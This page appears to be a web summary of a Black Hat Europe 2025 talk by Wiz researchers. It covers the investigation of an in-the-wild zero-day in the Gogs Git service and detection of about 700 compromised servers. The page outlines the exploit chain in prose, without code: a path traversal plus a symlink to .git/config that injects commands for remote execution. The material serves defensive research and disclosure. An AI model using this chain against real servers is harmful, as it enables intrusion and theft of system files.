CybersecurityDefense

Black Hat Europe 2025 | From Live Exploitation to Zero-Day Discovery: Investigating Attacks on Gogs

Black Hat
Black HatJun 4, 2026

Why It Matters

Unpatched self‑hosted Git services can become a silent conduit for widespread remote code execution, demanding proactive monitoring and rapid patching of both code and configuration flaws.

Key Takeaways

  • Live malware alert led to discovery of a zero‑day in Gogs.
  • Exploited path‑traversal and symlink bugs allowed arbitrary file writes.
  • Attackers leveraged open repository creation to gain remote code execution.
  • Over 700 Gogs instances worldwide were compromised using unique patterns.
  • Behavioral indicators like repository names can reveal large‑scale compromises.

Summary

The Black Hat Europe 2025 talk detailed how a routine YARA‑based malware alert uncovered a previously unknown zero‑day vulnerability in the self‑hosted Git service Gogs. Researchers from Wiz traced the infection on a customer’s cloud server, ruled out common entry points, and eventually linked the breach to two unpatched bugs—a path‑traversal flaw in the put‑contents API and a symlink‑editing weakness in the web editor.

By chaining these flaws, an attacker could create a repository, commit a symbolic link to the .git/config file, and overwrite it via the API, injecting arbitrary commands that execute when Gogs accesses the repository. The exploit required only the default, publicly accessible repository creation feature, allowing remote code execution and exfiltration of sensitive files such as /etc/passwd.

The presenters demonstrated the attack live, showing how the malicious repository appeared with eight‑character random names and how a simple Python scanner identified the same pattern on hundreds of exposed Gogs instances. Shodan queries revealed roughly 1,500 public Gogs servers, and the custom script flagged over 700 compromised hosts, confirming a widespread campaign.

The incident underscores the risk of self‑hosted development tools that lack rigorous update cycles and default open‑access settings. It also highlights the value of behavioral indicators—like unique repository naming patterns—as powerful IOCs for detecting large‑scale compromises beyond traditional hash or IP signatures.

Original Description

A single infected server led us into a much larger story. While investigating suspicious repositories on exposed **** Git servers, we uncovered signs of active exploitation: commands hidden inside repository configurations, payloads fetching remote shells, and infrastructure linked to a custom-packed Supershell C2. What at first looked like an opportunistic abuse of a known bug turned out to be something more: an unpatched zero-day vulnerability, already being leveraged in the wild.
While an older RCE was known, the affected systems matched a yet-unknown exploit chain. This mismatch was the first clue that attackers were using a new vulnerability, rather than simply reusing a patched one.
In this talk, we will retrace that investigation. Starting from live exploitation artifacts, we will show how we correlated repositories across multiple tenants, fingerprinted vulnerable internet-facing servers, and pieced together the attack chain. Our scans revealed over 700 compromised **** instances worldwide, with dozens already updated yet still showing signs of compromise. The evidence demonstrated that attackers had a working exploit before disclosure.
We will close with lessons learned for defenders. These include how to detect malicious repository abuse in developer platforms, techniques for hunting zero-days from threat intelligence leads, and what this case study means for the broader risk landscape of self-hosted developer tools.
By:
Gili Tikochinski | Malware Researcher, Wiz
Yaara Shriki | Threat Researcher, Wiz

Comments

Want to join the conversation?

Loading comments...